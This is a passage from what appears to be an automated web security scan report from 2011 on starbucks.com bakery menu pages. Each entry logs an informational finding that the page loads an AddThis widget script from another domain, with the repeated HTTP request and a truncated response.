Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:47:34 GMT
Connection: close
Content-Length: 42902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.207. http://www.starbucks.com/menu/food/bakery/hawaiian-bagel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/hawaiian-bagel

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/hawaiian-bagel HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:47:56 GMT
Connection: close
Content-Length: 43382

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.208. http://www.starbucks.com/menu/food/bakery/iced-lemon-pound-cake

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/iced-lemon-pound-cake

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/iced-lemon-pound-cake HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:48:22 GMT
Connection: close
Content-Length: 44302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.209. http://www.starbucks.com/menu/food/bakery/low-fat-raspberry-sunshine-muffin

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/low-fat-raspberry-sunshine-muffin

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/low-fat-raspberry-sunshine-muffin HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:48:34 GMT
Connection: close
Content-Length: 43659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.210. http://www.starbucks.com/menu/food/bakery/mallorca-sweet-bread

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/mallorca-sweet-bread

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/mallorca-sweet-bread HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:48:34 GMT
Connection: close
Content-Length: 43885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.211. http://www.starbucks.com/menu/food/bakery/maple-oat-pecan-scone

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/maple-oat-pecan-scone

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/maple-oat-pecan-scone HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:48:46 GMT
Connection: close
Content-Length: 43767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.212. http://www.starbucks.com/menu/food/bakery/marble-pound-cake

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/marble-pound-cake

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/marble-pound-cake HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:48:52 GMT
Connection: close
Content-Length: 43510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.213. http://www.starbucks.com/menu/food/bakery/marshmallow-dream-bar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/marshmallow-dream-bar

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/marshmallow-dream-bar HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:49:22 GMT
Connection: close
Content-Length: 43320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.214. http://www.starbucks.com/menu/food/bakery/morning-bun

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/morning-bun

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/morning-bun HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:49:33 GMT
Connection: close
Content-Length: 43053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.215. http://www.starbucks.com/menu/food/bakery/multigrain-bagel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/multigrain-bagel

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/multigrain-bagel HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:49:41 GMT
Connection: close
Content-Length: 43771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.216. http://www.starbucks.com/menu/food/bakery/old-fashion-glazed-doughnut

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/old-fashion-glazed-doughnut

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/old-fashion-glazed-doughnut HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:49:51 GMT
Connection: close
Content-Length: 43747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.217. http://www.starbucks.com/menu/food/bakery/outrageous-oatmeal-cookie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/outrageous-oatmeal-cookie

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/outrageous-oatmeal-cookie HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:50:41 GMT
Connection: close
Content-Length: 43551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.218. http://www.starbucks.com/menu/food/bakery/petite-vanilla-bean-scone

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/petite-vanilla-bean-scone

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/bakery/petite-vanilla-bean-scone HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:50:45 GMT
Connection: close
Content-Length: 43912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.219. http://www.starbucks.com/menu/food/bakery/plain-bagel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/plain-bagel

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/bakery/plain-bagel HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:50:53 GMT
Connection: close
Content-Length: 43409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.220. http://www.starbucks.com/menu/food/bakery/pumpkin-bread

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/pumpkin-bread

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/bakery/pumpkin-bread HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:53:32 GMT
Connection: close
Content-Length: 43311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.221. http://www.starbucks.com/menu/food/bakery/raspberry-scone

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/raspberry-scone

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/bakery/raspberry-scone HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:53:45 GMT
Connection: close
Content-Length: 43584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.222. http://www.starbucks.com/menu/food/bakery/red-velvet-cupcake

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/red-velvet-cupcake

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/bakery/red-velvet-cupcake HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:53:54 GMT
Connection: close
Content-Length: 44195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.223. http://www.starbucks.com/menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:08 GMT
Connection: close
Content-Length: 44502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.224. http://www.starbucks.com/menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:14 GMT
Connection: close
Content-Length: 44542

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.225. http://www.starbucks.com/menu/food/bakery/reduced-fat-very-berry-coffeecake

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/reduced-fat-very-berry-coffeecake

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/food/bakery/reduced-fat-very-berry-coffeecake HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:14 GMT
Connection: close
Content-Length: 44188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.226. http://www.starbucks.com/menu/food/bakery/starbucks-classic-coffee-cake

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/starbucks-classic-coffee-cake

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

